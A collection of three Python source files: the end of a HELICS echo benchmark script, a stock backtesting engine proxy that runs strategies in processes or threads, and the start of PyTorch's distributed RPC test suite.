sys.stdout.flush()
self.readyToRun = True
logging.info("echo leaf - the test is ready to run")
def _main_loop(self, vFed):
"""The main loop for running the HELICS functions.
Args:
vFed (helics federate object) - The value federate.
Returns:
(null)
"""
cnt = 0
txstring = "{:<100000}{:<100}".format(self.index_, "1")
tbuffer = chr(256)
itr = 5000
self.vFed = vFed
logging.info("echo leaf - starting the helics functions")
while cnt <= itr + 1:
h.helicsFederateRequestTimeAsync(self.vFed, 1.0)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
h.helicsFederateRequestTimeComplete(self.vFed)
if cnt <= itr:
h.helicsPublicationPublishString(self.pub, txstring)
if h.helicsInputIsUpdated(self.sub):
actLen = 0
h.helicsInputGetString(self.sub, tbuffer, 256, actLen)
if str(tbuffer) != txstring:
logging.error("incorrect string\n")
break
cnt += 1
h.helicsFederateFinalizeAsync(self.vFed)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
h.helicsFederateFinalizeComplete(self.vFed)
logging.info("echo leaf - the helics functions have been completed")
def run(self, parties, vFed):
"""This function executes all the above functions. This function
is what we are benchmarking to evaluate its performance.
Args:
parties (int) - The number of barriers to create for the threads.
In this case, it is the number of federates plus 1.
vFed (helics federate object) - The value federate.
Returns:
(null)
"""
logging.info("echo leaf - starting the execution of the helics functions")
self.vFed = vFed
self.parties = parties
if not self.readyToRun:
self.make_ready(self.vFed)
sys.stdout.flush()
self.call_on_ready(self.parties)
sys.stdout.flush()
self._main_loop(self.vFed)
logging.info("echo leaf - finished the execution of the helics functions")
def __del__(self):
h.helicsFederateFree(self.vFed)
logging.info("echo leaf - the test is done -> information is cleared")
def timer():
logging.info("starting the timer")
def BMecho_singleCore(federates):
"""This function performs the echo test.
Args:
federates (int) - The number of federates to create for the single
core echo test.
Returns:
(null)
"""
logging.info("starting the single core test")
t = Timer(1, timer)
t.cancel()
feds = [f for f in range(0, federates)]
wcore = h.helicsCreateCore("inproc", None, "--autobroker --federates={}".format((federates)))
hub = EchoHub_c()
hub_vFed = hub.create_value_federate(h.helicsCoreGetIdentifier(wcore))
hub.initialize(hub_vFed, federates)
leafs = [EchoLeaf_c() for f in range(0, federates)]
i = 0
leaf_vFeds = []
logging.info("preparing the federates")
for f in feds:
leaf_vFed = leafs[f].create_value_federate(h.helicsCoreGetIdentifier(wcore), i)
leafs[f].initialize(leaf_vFed, i)
leaf_vFeds.append(leaf_vFed)
i += 1
threads = []
i = 0
logging.info("creating the threads")
for l, f in zip(leaf_vFeds, feds):
x = Thread(target=leafs[f].run, name=leafs[f], args=(len(feds) + 1, l))
threads.append(x)
x.start()
i += 1
time.sleep(0.1)
hub.make_ready(hub_vFed)
logging.info("executing the echo hub")
t.start()
hub.run(len(feds) + 1, hub_vFed)
t.cancel()
logging.info("joining the threads")
for thrd in threads:
thrd.join()
h.helicsCoreFree(wcore)
h.helicsCleanupLibrary()
logging.info("finished the single core test")
def BMecho_multiCore(cTypeString, federates):
"""This function performs the multicore test for a specific core
type.
Args:
cTypeString (str) - Specific core type, e.g. inproc
federates (int) - The number of federates to create for the echo
multicore test.
Returns:
(null)
"""
logging.info("starting the multicore test for {}".format(cTypeString))
t = Timer(1, timer)
t.cancel()
if h.helicsIsCoreTypeAvailable(cTypeString) == h.helics_false:
t.start()
feds = [f for f in range(0, federates)]
initString = "--log_level=no_print --federates={}".format(federates)
broker = h.helicsCreateBroker(cTypeString, "brokerf", initString)
wcore = h.helicsCreateCore(cTypeString, "", "--federates=1 --log_level=no_print")
hub = EchoHub_c()
hub_vFed = hub.create_value_federate(h.helicsCoreGetIdentifier(wcore))
hub.initialize(hub_vFed, federates)
leafs = [EchoLeaf_c() for f in range(0, federates)]
cores = []
i = 0
leaf_vFeds = []
logging.info("preparing the federates")
for f in feds:
core = h.helicsCreateCore(cTypeString, None, "-f 1 --log_level=no_print")
h.helicsCoreConnect(core)
leaf_vFed = leafs[f].create_value_federate(h.helicsCoreGetIdentifier(core), i)
leafs[f].initialize(leaf_vFed, i)
leaf_vFeds.append(leaf_vFed)
cores.append(core)
i += 1
threads = []
i = 0
logging.info("creating the threads")
for l, f in zip(leaf_vFeds, feds):
x = Thread(target=leafs[f].run, name=leafs[f], args=(len(feds) + 1, l))
threads.append(x)
x.start()
i += 1
time.sleep(0.1)
hub.make_ready(hub_vFed)
logging.info("executing the echo hub")
t.start()
hub.run(len(feds) + 1, hub_vFed)
t.cancel()
logging.info("joining the threads")
for thrd in threads:
thrd.join()
h.helicsBrokerDisconnect(broker)
h.helicsBrokerFree(broker)
logging.info("clearing the cores")
for cr in cores:
h.helicsCoreFree(cr)
cores.clear()
h.helicsCoreFree(wcore)
h.helicsCleanupLibrary()
logging.info("finished the multicore test for {}".format(cTypeString))
def create_bm_dictionary(name, federate_count, core_type, real_time, cpu_time, threads):
"""This function creates a dictionary for a single benchmark
run.
Args:
name (str) - The name of the benchmark, e.g. BMecho_singleCore
federate_count (int) - The number of federates.
core_type (str) - The name of the core type.
real_time (float) - The human-interpreted time it takes to
execute this script.
cpu_time (float) - The time it takes a CPU to execute this script.
threads (int) - The number of threads.
Returns:
bm_dict (dict) - A dictionary of the benchmark results.
"""
if name == "BMecho_singleCore":
bm_dict = {
"name": "{}/{}/iterations:1/real_time".format(name, federate_count),
"run_name": "{}/{}/iterations:1/real_time".format(name, federate_count),
"run_type": "iteration",
"repetitions": 1,
"repetitions_index": 1,
"threads": threads,
"iterations": 1,
"real_time": real_time,
"cpu_time": cpu_time,
"time_unit": "s",
}
else:
bm_dict = {
"name": "{}/{}Core/{}/real_time".format(name, core_type, federate_count),
"run_name": "{}/{}Core/{}/real_time".format(name, core_type, federate_count),
"run_type": "iteration",
"repetitions": 1,
"repetitions_index": 1,
"threads": threads,
"iterations": 1,
"real_time": real_time,
"cpu_time": cpu_time,
"time_unit": "s",
}
return bm_dict
def wrapper(func, *args, **kwargs):
"""This is a wrapper function to be used for benchmarking. It allows
func to be passed directly to timeit.
Args:
func (function) - The function to be wrapped.
Returns:
wrapped (function) - The original function, but in a format that
is ready to be passed to the timeit function call.
"""
def wrapped():
return func(*args, **kwargs)
return wrapped
def create_output_file(benchmark, output_path, filename, date, bm_dicts):
"""This function creates the output file, which contains some basic
information, along with the benchmark results.
Args:
benchmark (str) - The name of the benchmark, e.g. echoBenchmark
output_path (str) - The location to send the results.
filename (str) - The name of the results file.
date (datetime object) - The date and time of the benchmark run.
bm_dicts (list) - The list of benchmark results.
Returns:
(null)
"""
helics_version = h.helicsGetVersion()
cpu_freq = psutil.cpu_freq()
# zmq_version = h.getZMQVersion()
s, v, c = platform.system(), platform.version(), platform.python_compiler()
compiler = "{}-{}:{}".format(s, v, c)
build_flags_dict = sysconfig.get_config_vars()
build_flags = (
str(build_flags_dict.get("base")) + "\\" + "py{}".format(build_flags_dict.get("py_version"))
)
machine = platform.machine()
# NOTE: To get the host name, do platform.node()
# Creating the header string
string = "HELICS_BENCHMARK: {}\n".format(benchmark)
string += "------------HELICS BUILD INFO -------------\n"
string += "HELICS VERSION: {}\n".format(helics_version)
# string += 'ZMQ VERSION: {}\n'.format(zmq_version)
string += "COMPILER INFO: {}\n".format(compiler)
string += "BUILD FLAGS: {}\n".format(build_flags)
string += "------------PROCESSOR INFO ----------------\n"
string += "HOST PROCESSOR TYPE: {}\n".format(machine)
string += "CPU MODEL: {}\n".format(cpuinfo.get_cpu_info().get("brand"))
string += "NUM CPU: {}\n".format(multiprocessing.cpu_count())
string += "-------------------------------------------\n"
bm_dict = {
"context": {
"date": date,
"host_name": platform.node(),
"executable": sys.executable,
"num_cpus": multiprocessing.cpu_count(),
"mhz_per_cpu": cpu_freq.max,
"cpu_scaling_enabled": False,
"caches": [],
"load_avg": [],
"library_build_type": "release",
},
"benchmarks": bm_dicts,
}
bm_dict = json.dumps(bm_dict, indent=2)
string += str(bm_dict)
# Combing the header string with the benchmark dictionary
with open("{}\\{}.txt".format(output_path, filename), "w") as output_file:
output_file.write(string)
def _auto_run(args):
"""This function runs this script as a stand-alone executable.
Args:
'-p' or '--power' - An integaer, including 0, used to represent
how many federates should be created, e.g. 2**p where p equals 0, 1,
2, etc.
'-o' or '--output_path' - The path to send the benchmark results.
Returns:
(null)
"""
logging.info("starting the echoBenchmark run")
benchmarks = []
assert isinstance(args.power, int)
for i in range(0, args.power):
single = wrapper(BMecho_singleCore, 2**i)
single_real_time_start = time.time()
BMecho_singleCore(2**i)
single_real_time_stop = time.time()
single_cpu_time = timeit.timeit(stmt=single, number=1)
single_real_time = single_real_time_stop - single_real_time_start
single_dict = create_bm_dictionary(
"BMecho_singleCore", 2**i, "singleCore", single_real_time, single_cpu_time, 1
)
inproc = wrapper(BMecho_multiCore, "inproc", 2**i)
inproc_real_time_start = time.time()
BMecho_multiCore("inproc", 2**i)
inproc_real_time_stop = time.time()
inproc_cpu_time = timeit.timeit(stmt=inproc, number=1)
inproc_real_time = inproc_real_time_stop - inproc_real_time_start
inproc_dict = create_bm_dictionary(
"BMecho_multiCore", 2**i, "inproc", inproc_real_time, inproc_cpu_time, 1
)
zmq = wrapper(BMecho_multiCore, "zmq", 2**i)
zmq_real_time_start = time.time()
BMecho_multiCore("zmq", 2**i)
zmq_real_time_stop = time.time()
zmq_cpu_time = timeit.timeit(stmt=zmq, number=1)
zmq_real_time = zmq_real_time_stop - zmq_real_time_start
zmq_dict = create_bm_dictionary(
"BMecho_multiCore", 2**i, "zmq", zmq_real_time, zmq_cpu_time, 1
)
zmqss = wrapper(BMecho_multiCore, "zmqss", 2**i)
zmqss_real_time_start = time.time()
BMecho_multiCore("zmqss", 2**i)
zmqss_real_time_stop = time.time()
zmqss_cpu_time = timeit.timeit(stmt=zmqss, number=1)
zmqss_real_time = zmqss_real_time_stop - zmqss_real_time_start
zmqss_dict = create_bm_dictionary(
"BMecho_multiCore", 2**i, "zmqss", zmqss_real_time, zmqss_cpu_time, 1
)
udp = wrapper(BMecho_multiCore, "udp", 2**i)
udp_real_time_start = time.time()
BMecho_multiCore("udp", 2**i)
udp_real_time_stop = time.time()
udp_cpu_time = timeit.timeit(stmt=udp, number=1)
udp_real_time = udp_real_time_stop - udp_real_time_start
udp_dict = create_bm_dictionary(
"BMecho_multiCore", 2**i, "udp", udp_real_time, udp_cpu_time, 1
)
# NOTE: The following core types take way too long to complete.
# This indicates there is an issue that cannot be fixed by Python,
# but within HELICS for these core types to work. When these core
# types finally work, uncomment these lines and update the script
# to match the above lines and run this code to include their
# results.
# ipc = wrapper(BMecho_multiCore, 'ipc', 1)
# print('ipc core before timeit')
# ipc_b = timeit.timeit(stmt=ipc, number=1)
# print('ipc core after timeit')
# ipc_dict = create_bm_dictionary(
# 'BMecho_multiCore', 2**i, 'ipc', ipc_b, 1)
# tcp = wrapper(BMecho_multiCore, 'tcp', 1)
# tcp_b = timeit.timeit(stmt=tcp, number=1)
# tcp_dict = create_bm_dictionary(
# 'BMecho_multiCore', 2**i, 'tcp', tcp_b, 1)
# tcpss = wrapper(BMecho_multiCore, 'tcpss', 1)
# tcpss_b = timeit.timeit(stmt=tcpss, number=1)
# tcpss_dict = create_bm_dictionary(
# 'BMecho_multiCore', 2**i, 'tcpss', tcpss_b, 1)
benchmarks.append([single_dict, inproc_dict, zmq_dict, zmqss_dict, udp_dict])
# Simplifying the benchmarks list before adding it to the output file
benchmarks = [val for sublist in benchmarks for val in sublist]
# Getting the current date and time of the run
date_time = "{}".format(datetime.datetime.now())
run_id = "".join(random.choices(string.ascii_uppercase + string.digits, k=5))
create_output_file(
"echoBenchmark",
args.output_path,
"bm_echo_pyResults{}_{}".format(datetime.date.today(), str(run_id)),
date_time,
benchmarks,
)
logging.info("finished the echoBenchmark run")
if __name__ == "__main__":
fileHandle = logging.FileHandler("echoBenchmarks.log", mode="w")
fileHandle.setLevel(logging.DEBUG)
streamHandle = logging.StreamHandler(sys.stdout)
streamHandle.setLevel(logging.ERROR)
logging.basicConfig(level=logging.INFO, handlers=[fileHandle, streamHandle])
parser = argparse.ArgumentParser(description="Produce benchmark results.")
script_path = os.path.dirname(os.path.realpath(__file__))
# print(script_path)
head, tail = os.path.split(script_path)
parser.add_argument("-p", "--power", nargs="?", default=2)
parser.add_argument("-o", "--output_path", nargs="?", default=os.path.join(head))
args = parser.parse_args()
_auto_run(args)
|
DyStockBackTestingStrategyEngineProxy.py
|
import multiprocessing
import threading
import queue
from .DyStockBackTestingStrategyEngineProcess import *
class DyStockBackTestingStrategyEngineProxy(threading.Thread):
""" 以进程方式启动一个周期的策略回测 """
def __init__(self, eventEngine):
super().__init__()
self._eventEngine = eventEngine
self._ctx = multiprocessing.get_context('spawn')
self._queue = self._ctx.Queue() # queue to receive event from child processes
self._processes = []
self._childQueues = []
self.start()
def run(self):
while True:
event = self._queue.get()
self._eventEngine.put(event)
def startBackTesting(self, reqData):
childQueue = self._ctx.Queue()
self._childQueues.append(childQueue)
p = self._ctx.Process(target=dyStockBackTestingStrategyEngineProcess, args=(self._queue, childQueue, reqData))
p.start()
self._processes.append(p)
class DyStockBackTestingStrategyEngineProxyThread(threading.Thread):
""" 以线程方式启动一个周期的策略回测, 主要做调试用 """
def __init__(self, eventEngine):
super().__init__()
self._eventEngine = eventEngine
self._queue = queue.Queue() # queue to receive event from child threads
self._threads = []
self._childQueues = []
self.start()
def run(self):
while True:
event = self._queue.get()
self._eventEngine.put(event)
def startBackTesting(self, reqData):
childQueue = queue.Queue()
self._childQueues.append(childQueue)
t = threading.Thread(target=dyStockBackTestingStrategyEngineProcess, args=(self._queue, childQueue, reqData))
t.start()
self._threads.append(t)
|
rpc_test.py
|
import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import IS_MACOS, load_tests, sandcastle_skip_if
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
rpc.WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_sparse_tensor():
i = [[0, 1, 1], [2, 0, 2]]
v = [3, 4, 5]
return torch.sparse_coo_tensor(i, v, (2, 3))
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock", "event")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
self.event = torch.cuda.Event(enable_timing=True)
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
self.event.record()
return self.tensor.sum()
# Copied from test/test_cuda.py.
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class RpcTest(RpcAgentTestFixture):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1 + 3)
def _test_self_remote_rref_as_rpc_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, torch.ones(2, 2) + 1))
self.assertEqual(ret, torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2) + 1)
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2))
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_rpc_arg(dst)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._test_self_remote_rref_as_rpc_arg(rpc.get_worker_info())
def _test_self_remote_rref_as_remote_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
self.assertEqual(
